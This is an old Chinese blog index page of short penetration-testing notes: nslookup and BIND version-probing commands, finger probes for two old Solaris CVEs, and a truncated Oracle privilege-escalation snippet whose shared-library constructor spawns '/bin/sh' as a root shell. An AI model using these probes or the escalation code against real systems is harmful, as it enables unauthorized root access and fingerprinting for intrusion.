每天进步一点点
百度首页 | 百度空间
 
RSS订阅
  
   
 
文章列表
  
google的图片搜索的“奇特”现象
2008-07-27 02:03

首先看这个连接:

http://images.google.cn/imgres?imgurl=http://www.telecomsec.org.cn/images/telecomsec2007/spon-DBAPPSecurit

阅读全文>>
类别:自言自语 | 评论(0) | 浏览()
 
NSLOOKUP命令的使用方法
2008-07-25 01:25
查询A记录:nslookup 域名
查询MX记录:nslookup -q=mx 域名
查询NS记录:nslookup -q=ns 域名
查询CNAME记录:nslookup 域名

类别:自言自语 | 评论(0) | 浏览()
 
[Tips]bind版本确认
2008-07-24 14:24

nslookup -q=txt -class=chaos version.bind DNS_IP

dig @DNS_IP -c chaos version.bind txt

类别:自言自语 | 评论(0) | 浏览()
 
CVE-1999-0197 和CVE-2001-1503
2008-07-23 12:43

CVE-1999-0197   for Solaris 8/SUNOS 5.8

finger 123213@sunhost

CVE-2001-1503

finger 'a b c d e f g h'@sunhost

给客户做渗透测试的时候居然还能遇到CVE-1999-0197,才疏学浅~~~~~

一时没认出来。

类别:默认分类 | 评论(2) | 浏览()
 
Oracle Database Local Untrusted Library Path Vulnerability
2008-07-21 13:07

渗透的时候也许会用得到,权限提升的一种办法。

-- Example with libclntsh.so

$ cat test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


void __attribute__ ((constructor)) my_init(void)
{
printf("[+] It works! Root shell...\n");
        system("/bin/sh");
}

$ cc test.c -fPIC -o test.so -shared
$
mv /home/joxean/oracle10g/p

阅读全文>>
类别:自言自语 | 评论(0) | 浏览()
 
更多文章>>
     
 
最近访客
  
 

莣孒怎麼┍哭
reiayanami0001
hi_heige
dongyang_sec

ayaREI
shineastdh
sloo
kgdiwss
     
 
 
最新照片
  
   
 
其它
  
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2008 Baidu